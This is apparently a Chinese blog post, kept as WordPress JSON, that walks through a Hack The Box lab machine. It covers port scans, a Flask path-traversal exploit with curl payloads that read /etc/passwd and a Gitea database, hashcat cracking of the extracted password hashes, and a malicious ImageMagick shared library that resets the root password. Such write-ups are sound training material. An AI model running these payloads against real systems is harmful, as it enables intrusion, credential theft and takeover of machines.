{"id":221,"date":"2025-02-19T13:21:48","date_gmt":"2025-02-19T05:21:48","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=221"},"modified":"2026-01-29T16:16:16","modified_gmt":"2026-01-29T08:16:16","slug":"221","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/02\/19\/221\/","title":{"rendered":"HTB\u9776\u673a Titanic \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1 id=\"hGUch\">\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<\/strong><code><strong>10.10.11.55<\/strong><\/code><\/p><\/blockquote>\n<hr \/>\n<h1 id=\"rfJt9\">\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2 id=\"baomD\">ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">PING 10.10.11.55 (10.10.11.55) 56(84) bytes of data.\n64 bytes from 10.10.11.55: icmp_seq=1 ttl=63 time=233 ms\n64 bytes from 10.10.11.55: icmp_seq=2 ttl=63 time=230 ms\n64 bytes from 10.10.11.55: icmp_seq=3 ttl=63 time=228 ms\n64 bytes from 10.10.11.55: icmp_seq=4 ttl=63 time=227 ms\n\n--- 10.10.11.55 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3001ms\nrtt min\/avg\/max\/mdev = 227.349\/229.478\/233.172\/2.347 ms<\/code><\/pre>\n<p>\u9776\u573a\u7f51\u7edc\u72b6\u51b5\u826f\u597d\u3002<\/p>\n<h2 id=\"syFBg\">\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Tue Feb 18 19:54:52 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN .\/fin_report.txt 10.10.11.55\nWarning: 10.10.11.55 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.11.55\nHost is up (0.23s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT   STATE         SERVICE\n22\/tcp open|filtered ssh\n80\/tcp open|filtered http\n\n# Nmap done at Tue Feb 18 19:55:22 2025 -- 1 IP address (1 host up) scanned in 29.28 seconds<\/code><\/pre>\n<p>\u9776\u673a\u7591\u4f3c\u5f00\u653e\u4e86<code>SSH<\/code>\u548c<code>HTTP<\/code>\u670d\u52a1\u3002<\/p>\n<h2 id=\"I6dpv\">\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><strong><code>TCP<\/code>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Tue Feb 18 19:57:47 2025 as: \/usr\/lib\/nmap\/nmap -sS -sV -A -p- --min-rate 3000 -oN .\/tcp_report.txt 10.10.11.55\nWarning: 10.10.11.55 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.11.55\nHost is up (0.23s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA)\n|_  256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.52\n|_http-title: Did not follow redirect to http:\/\/titanic.htb\/\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\nDevice type: general purpose\nRunning: Linux 4.X|5.X\nOS CPE: cpe:\/o:linux:linux_kernel:4 cpe:\/o:linux:linux_kernel:5\nOS details: Linux 4.15 - 5.19\nNetwork Distance: 2 hops\nService Info: Host: titanic.htb; OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using port 8080\/tcp)\nHOP RTT       ADDRESS\n1   226.90 ms 10.10.14.1\n2   227.25 ms 10.10.11.55\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Tue Feb 18 19:58:35 2025 -- 1 IP address (1 host up) scanned in 48.01 seconds<\/code><\/pre>\n<p><strong><code>UDP<\/code>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Tue Feb 18 19:59:10 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN .\/udp_ports.txt 10.10.11.55\nWarning: 10.10.11.55 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.11.55\nHost is up (0.25s latency).\nAll 65535 scanned ports on 10.10.11.55 are in ignored states.\nNot shown: 65298 open|filtered udp ports (no-response), 237 closed udp ports (port-unreach)\n\n# Nmap done at Tue Feb 18 20:03:12 2025 -- 1 IP address (1 host up) scanned in 242.37 seconds<\/code><\/pre>\n<p><strong><code>UDP<\/code>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\">\uff08\u65e0\uff09<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\uff0c\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3a<code>Ubuntu Linux<\/code>\uff0c\u53ea\u5f00\u653e\u4e86<code>SSH<\/code>\u548c<code>HTTP Web<\/code>\u670d\u52a1\uff0c\u57df\u540d\u4e3a<code>titanic.htb<\/code>\u3002<\/p>\n<hr \/>\n<h1 id=\"vSzOA\">\u670d\u52a1\u63a2\u6d4b<\/h1>\n<h2 id=\"hcOFq\">SSH\u670d\u52a1\uff0822\u7aef\u53e3\uff09<\/h2>\n<p>\u7aef\u53e3<code>Banner<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/megumin\/Documents\/pentest_notes\/titanic]\n\u2514\u2500# nc -nv 10.10.11.55 22                                       \n(UNKNOWN) [10.10.11.55] 22 (ssh) open\nSSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.10<\/code><\/pre>\n<h2 id=\"pSigs\">Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n<h3 id=\"pSHsr\">\u5b50\u57df\u540d\u63a2\u6d4b<\/h3>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>wfuzz<\/code>\u63a2\u6d4b\u7f51\u7ad9\u5b50\u57df\u540d\uff1a<\/p>\n<pre><code class=\"language-shell\">wfuzz -w \/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt -u 10.10.11.55 -H \"Host: FUZZ.titanic.htb\" -t 60 --hw 28 --hc 400<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739881938346-c5f87a3d-c774-4a7f-bc8d-f728ac96959a.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0\u5b50\u57df\u540d<code>dev.titanic.htb<\/code>\u3002<\/p>\n<h3 id=\"l7hsM\">\u4e3b\u7ad9<\/h3>\n<p>\u6253\u5f00\u4e3b\u9875\uff1a<code>http:\/\/titanic.htb\/<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739880880464-a3c820bf-1f3c-4502-9094-82d01c9b5b74.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u8c8c\u4f3c\u662f\u4e00\u4e2a\u65c5\u6e38\u9884\u8ba2\u7cfb\u7edf\u7684\u5ba2\u6237\u9875\u9762\u3002\u70b9\u51fb<code>Book Your Trip<\/code>\u6309\u94ae\uff0c\u5f39\u51fa\u4e86\u4e2a\u4eba\u4fe1\u606f\u767b\u8bb0\u8868\u5355\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739880959090-a8ae24a9-1001-4f57-bdc0-74bbe3a2f13f.png\" alt=\"\" \/><\/p>\n<h3 id=\"ZSBa7\">\u65c1\u7ad9\uff08dev\uff09<\/h3>\n<p>\u6253\u5f00\u7f51\u5740\uff1a<code>http:\/\/dev.titanic.htb\/<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739921323562-6e79dd37-5ffa-4c92-a97a-6f08e3349f66.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u90e8\u7f72\u4e86<code>Gitea<\/code>\u6e90\u4ee3\u7801\u6258\u7ba1\u7cfb\u7edf\uff0c\u7248\u672c\u4e3a<code>v1.22.1<\/code>\uff0c\u672a\u53d1\u73b0\u6f0f\u6d1e\u3002<\/p>\n<p>\u70b9\u51fb\u63a2\u7d22\u6309\u94ae\uff0c\u53d1\u73b0\u4e24\u4e2a\u516c\u5171\u4ee3\u7801\u5e93\uff1a<code>flask-app<\/code>\u548c<code>docker-config<\/code>\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739922425310-03db8122-dd81-4029-bc1e-6c418bbd9e79.png\" alt=\"\" \/><\/p>\n<p>\u5728<code>docker-config<\/code>\u5e93\u5185\u53d1\u73b0\u654f\u611f\u6587\u4ef6\uff1a<code>.\/gitea\/docker-compose.yml<\/code>\u548c<code>.\/mysql\/docker-compose.yml<\/code>\uff0c\u6587\u4ef6\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-yaml\"># .\/gitea\/docker-compose.yml\nversion: '3'\n\nservices:\n  gitea:\n    image: gitea\/gitea\n    container_name: gitea\n    ports:\n      - \"127.0.0.1:3000:3000\"\n      - \"127.0.0.1:2222:22\"  # Optional for SSH access\n    volumes:\n      - \/home\/developer\/gitea\/data:\/data # Replace with your path\n    environment:\n      - USER_UID=1000\n      - USER_GID=1000\n    restart: always<\/code><\/pre>\n<pre><code class=\"language-yaml\"># .\/mysql\/docker-compose.yml\nversion: '3.8'\n\nservices:\n  mysql:\n    image: mysql:8.0\n    container_name: mysql\n    ports:\n      - \"127.0.0.1:3306:3306\"\n    environment:\n      MYSQL_ROOT_PASSWORD: 'MySQLP@$w0rd!'\n      MYSQL_DATABASE: tickets \n      MYSQL_USER: sql_svc\n      MYSQL_PASSWORD: sql_password\n    restart: always<\/code><\/pre>\n<p>\u53d1\u73b0\u7591\u4f3c<code>MySQL<\/code>\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u4e3b\u673a\uff1a\u672c\u5730<\/li>\n<li>\u7aef\u53e3\uff1a<code>3306<\/code><\/li>\n<li>\u6570\u636e\u5e93\uff1a<code>tickets<\/code><\/li>\n<li>\u7528\u6237\u540d\uff1a<code>root<\/code>\uff0c\u5bc6\u7801\uff1a<code>MySQLP@$$w0rd!<\/code><\/li>\n<li>\u7528\u6237\u540d\uff1a<code>sql_svc<\/code>\uff0c\u5bc6\u7801\uff1a<code>sql_password<\/code><\/li>\n<\/ul>\n<p>\u4ee5\u53ca<code>Gitea<\/code>\u6570\u636e\u76ee\u5f55\u5728\u5bbf\u4e3b\u673a\u7684\u7edd\u5bf9\u8def\u5f84\uff1a<code>\/home\/developer\/gitea\/data<\/code><\/p>\n<p>\u67e5\u770b<code>flask-app<\/code>\u4ed3\u5e93\uff0c\u53d1\u73b0\u4e3b\u7ad9<code>Python Flask<\/code>\u5e94\u7528\u6e90\u4ee3\u7801\uff1a<\/p>\n<pre><code class=\"language-python\">from flask import Flask, request, jsonify, send_file, render_template, redirect, url_for, Response\nimport os\nimport json\nfrom uuid import uuid4\n\napp = Flask(__name__)\n\nTICKETS_DIR = \"tickets\"\n\nif not os.path.exists(TICKETS_DIR):\n    os.makedirs(TICKETS_DIR)\n\n@app.route('\/')\ndef index():\n    return render_template('index.html')\n\n@app.route('\/book', methods=['POST'])\ndef book_ticket():\n    data = {\n        \"name\": request.form['name'],\n        \"email\": request.form['email'],\n        \"phone\": request.form['phone'],\n        \"date\": request.form['date'],\n        \"cabin\": request.form['cabin']\n    }\n\n    ticket_id = str(uuid4())\n    json_filename = f\"{ticket_id}.json\"\n    json_filepath = os.path.join(TICKETS_DIR, json_filename)\n\n    with open(json_filepath, 'w') as json_file:\n        json.dump(data, json_file)\n\n    return redirect(url_for('download_ticket', ticket=json_filename))\n\n@app.route('\/download', methods=['GET'])\ndef download_ticket():\n    ticket = request.args.get('ticket')\n    if not ticket:\n        return jsonify({\"error\": \"Ticket parameter is required\"}), 400\n\n    json_filepath = os.path.join(TICKETS_DIR, ticket)\n\n    if os.path.exists(json_filepath):\n        return send_file(json_filepath, as_attachment=True, download_name=ticket)\n    else:\n        return jsonify({\"error\": \"Ticket not found\"}), 404\n\nif __name__ == '__main__':\n    app.run(host='127.0.0.1', port=5000)<\/code><\/pre>\n<p>\u5728\u6e90\u4ee3\u7801<code>download_ticket()<\/code>\u51fd\u6570\u5185\uff08\u7b2c<code>45<\/code>\u884c\uff09\u53d1\u73b0\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\u3002\u7a0b\u5e8f\u5c06\u4ece<code>GET<\/code>\u8bf7\u6c42\u5185\u63a5\u6536\u7684<code>ticket<\/code>\u53d8\u91cf\u76f4\u63a5\u548c\u76f8\u5bf9\u8def\u5f84<code>tickets<\/code>\u8fdb\u884c\u4e86\u62fc\u63a5\uff0c\u800c\u672a\u8fc7\u6ee4\u8def\u5f84\u7b26\u53f7<code>\/<\/code>\u3002<\/p>\n<hr \/>\n<h1 id=\"KqRmt\">\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<h2 id=\"YsXov\">\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u6253\u5f00\u4e3b\u7ad9\uff0c\u8bbf\u95ee<code>\/download<\/code>\u8def\u7531\u7aef\u70b9\uff0c\u5728<code>ticket<\/code>\u53c2\u6570\u4e2d\u8f93\u5165<code>\/etc\/passwd<\/code>\u6587\u4ef6\u7684\u76f8\u5bf9\u8def\u5f84\uff1a<code>http:\/\/titanic.htb\/download?ticket=\/..\/..\/..\/..\/..\/etc\/passwd<\/code><\/p>\n<pre><code class=\"language-shell\">curl \"http:\/\/titanic.htb\/download?ticket=\/..\/..\/..\/..\/..\/etc\/passwd\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739923322248-0d5a48cc-4506-4237-9dbc-626252685eab.png\" alt=\"\" \/><\/p>\n<p><strong>\u6210\u529f\uff01<\/strong>\u53d1\u73b0\u7cfb\u7edf\u5185\u5b58\u5728<code>developer<\/code>\u7528\u6237\u3002<\/p>\n<p>\u6839\u636e\u53d1\u73b0\u7684<code>Gitea<\/code>\u6570\u636e\u76ee\u5f55\u90e8\u7f72\u8def\u5f84\uff0c\u5c1d\u8bd5\u8bfb\u53d6<code>Gitea<\/code>\u7684\u914d\u7f6e\u6587\u4ef6<code>app.ini<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">curl \"http:\/\/titanic.htb\/download?ticket=\/..\/..\/..\/..\/..\/home\/developer\/gitea\/data\/gitea\/conf\/app.ini\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739923497168-bcbbaf80-ef1d-49a6-b19c-376cfede1b24.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u8bfb\u53d6\u914d\u7f6e\u6587\u4ef6\uff0c\u5e76\u53d1\u73b0<code>SQLite<\/code>\u6570\u636e\u5e93\u8def\u5f84\uff1a<code>\/home\/developer\/gitea\/data\/gitea\/gitea.db<\/code>\uff0c\u76f4\u63a5\u4e0b\u8f7d\u5230\u672c\u5730\uff1a<\/p>\n<pre><code class=\"language-shell\">wget \"http:\/\/titanic.htb\/download?ticket=\/..\/..\/..\/..\/..\/home\/developer\/gitea\/data\/gitea\/gitea.db\" -O .\/gitea.db<\/code><\/pre>\n<p>\u4f7f\u7528<code>sqlitebrowser<\/code>\u5de5\u5177\u6253\u5f00\uff0c\u67e5\u770b<code>user<\/code>\u8868\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739924547536-061671df-9912-474d-95b5-e903c7dd3044.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u7528\u6237\u5bc6\u7801\u4f7f\u7528\u4e86<code>PBKDF2-HMAC-SHA256<\/code>\u52a0\u5bc6\u65b9\u6cd5\uff0c\u8fed\u4ee3\u6b21\u6570\u4e3a<code>50000<\/code>\u6b21\u4e14\u6709\u76d0\u503c\u3002\u76f4\u63a5\u5c06<code>administrator<\/code>\u3001<code>developer<\/code>\u548c<code>testing<\/code>\u7528\u6237\u7684\u5bc6\u7801\u8f6c\u4e3a<code>hashcat<\/code>\u53ef\u8bfb\u53d6\u7684\u683c\u5f0f\u540e\u8fdb\u884c\u7834\u89e3\u3002\u8f6c\u5316\u811a\u672c\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python3\nimport base64\nadmin_hash = base64.b64encode(bytes.fromhex(\"cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136\")).decode(\"utf-8\")\nadmin_salt = base64.b64encode(bytes.fromhex(\"2d149e5fbd1b20cf31db3e3c6a28fc9b\")).decode(\"utf-8\")\ndeveloper_hash = base64.b64encode(bytes.fromhex(\"e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56\")).decode(\"utf-8\")\ndeveloper_salt = base64.b64encode(bytes.fromhex(\"8bf3e3452b78544f8bee9400d6936d34\")).decode(\"utf-8\")\ntesting_hash = base64.b64encode(bytes.fromhex(\"b2c86971b51a09f68320a677b9b9fb35e9a43e4cb6b620114fbce185c85d243a213c94b4f524434ffc73c6851662ff76ca83\")).decode(\"utf-8\")\ntesting_salt = base64.b64encode(bytes.fromhex(\"2ab303b548c0df7d7df228daa3e1662e\")).decode(\"utf-8\")\nprint(\"sha256:50000:%s:%s\"%(admin_salt,admin_hash))\nprint(\"sha256:50000:%s:%s\"%(developer_salt,developer_hash))\nprint(\"sha256:50000:%s:%s\"%(testing_salt,testing_hash))<\/code><\/pre>\n<p>\u968f\u540e\u5c06\u811a\u672c\u8f93\u51fa\u4fdd\u5b58\u5230\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-shell\">.\/converthash.py &gt; gitea_hash.txt<\/code><\/pre>\n<p>\u63a5\u7740\u4f7f\u7528<code>hashcat<\/code>\u8fdb\u884c\u7834\u89e3\uff1a<\/p>\n<pre><code class=\"language-powershell\">.hashcat.exe -m 10900 -a 0 Z:titanicgitea_hash.txt .rockyou.txt --force<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739926417919-844b7481-91d1-45a3-b780-0bbbbacc8c68.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0\u7528\u6237\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u7528\u6237\u540d\uff1a<code>developer<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>25282528<\/code><\/li>\n<\/ul>\n<p>\u76f4\u63a5\u767b\u5f55<code>SSH<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739926721116-1735f4d7-d512-44d6-89cb-d94ebc9c6de8.png\" alt=\"\" \/><\/p>\n<p><strong>\u6210\u529f\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1 id=\"L59tS\">\u6743\u9650\u63d0\u5347<\/h1>\n<h2 id=\"tW9FO\">\u76ee\u5f55\u4fe1\u606f\u6536\u96c6<\/h2>\n<p>\u8fdb\u5165\u7cfb\u7edf\u540e\uff0c\u53d1\u73b0\u53ef\u7591\u811a\u672c\u6587\u4ef6<code>\/opt\/scripts\/identify_images.sh<\/code>\uff0c\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-shell\">cd \/opt\/app\/static\/assets\/images\ntruncate -s 0 metadata.log\nfind \/opt\/app\/static\/assets\/images\/ -type f -name \"*.jpg\" | xargs \/usr\/bin\/magick identify &gt;&gt; metadata.log<\/code><\/pre>\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u672a\u53d1\u73b0\u53ef\u7591\u4fe1\u606f\u3002<\/p>\n<h2 id=\"cLFnL\">ImageMagick\u6f0f\u6d1e\u5229\u7528\u63d0\u6743<\/h2>\n<p>\u5728\u76ee\u5f55\u4fe1\u606f\u6536\u96c6\u9636\u6bb5\uff0c\u53d1\u73b0\u53ef\u7591\u811a\u672c<code>\/opt\/scripts\/identify_images.sh<\/code>\uff0c\u811a\u672c\u4e2d\u7b2c\u4e09\u884c\u8c03\u7528\u4e86<code>\/usr\/bin\/magick<\/code>\u7a0b\u5e8f\u3002\u5c1d\u8bd5\u67e5\u770b\u8be5\u7a0b\u5e8f\uff1a<\/p>\n<pre><code class=\"language-shell\">ls -lA \/usr\/bin\/magick\nmagick -version<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739940837704-9fa2250b-74bd-4bf7-aa35-80ab8cca9e84.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u8be5\u7a0b\u5e8f\u4e3a<code>ImageMagick<\/code>\u56fe\u50cf\u5904\u7406\u8f6f\u4ef6\uff0c\u7248\u672c\u4e3a<code>v7.1.1-35<\/code>\uff0c\u540c\u65f6\u6000\u7591<code>identify_images.sh<\/code>\u4e3a\u5b9a\u65f6\u811a\u672c\u3002<\/p>\n<p>\u5c1d\u8bd5\u8054\u7f51\u641c\u7d22\u8be5\u7248\u672c<code>ImageMagick<\/code>\u6f0f\u6d1e\uff0c\u6210\u529f\u53d1\u73b0\u5176\u5b58\u5728\u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff1a<a href=\"https:\/\/github.com\/ImageMagick\/ImageMagick\/security\/advisories\/GHSA-8rxc-922v-phg8\" target=\"_blank\"  rel=\"nofollow\" >Arbitrary Code Execution in AppImage version ImageMagick \u00b7 Advisory \u00b7 ImageMagick\/ImageMagick<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739941040471-55f034cc-e668-4116-8626-3c2f7b0ce9a1.png\" alt=\"\" \/><\/p>\n<p>\u6839\u636e\u6f0f\u6d1e\u63cf\u8ff0\uff0c\u76f4\u63a5\u5728\u811a\u672c\u5de5\u4f5c\u76ee\u5f55<code>\/opt\/app\/static\/assets\/images<\/code>\u7f16\u8bd1\u6076\u610f\u7684<code>so<\/code>\u6269\u5c55\u5e93\u6587\u4ef6<code>libxcb.so.1<\/code>\uff1a<\/p>\n<pre><code class=\"language-c\">#include &lt;stdio.h&gt;\n#include &lt;stdlib.h&gt;\n#include &lt;unistd.h&gt;\n\n__attribute__((constructor)) void init(){\n    system(\"id &gt; .\/id.txt\");\n    system(\"echo 'root:*********' | chpasswd\");\n    exit(0);\n}<\/code><\/pre>\n<pre><code class=\"language-shell\">gcc -x c -shared -fPIC -o .\/libxcb.so.1 .\/libxcb-evil.c<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739941403985-e339bed4-7de2-4122-945f-fc7a7db59a86.png\" alt=\"\" \/><\/p>\n<p>\u7b49\u5f85\u4e00\u4f1a\u540e\uff0c\u5c1d\u8bd5\u5207\u6362\u81f3<code>root<\/code>\u7528\u6237\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739941509655-9903aa2a-f100-4b8a-abd8-8df29f64837a.png\" alt=\"\" \/><\/p>\n<p><strong>\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1 id=\"hHxyD\">\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.11.55 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b PING 10.10.11.55 (10.10.11.55)  &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-221","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/221","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=221"}],"version-history":[{"count":2,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/221\/revisions"}],"predecessor-version":[{"id":223,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/221\/revisions\/223"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=221"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=221"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=221"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}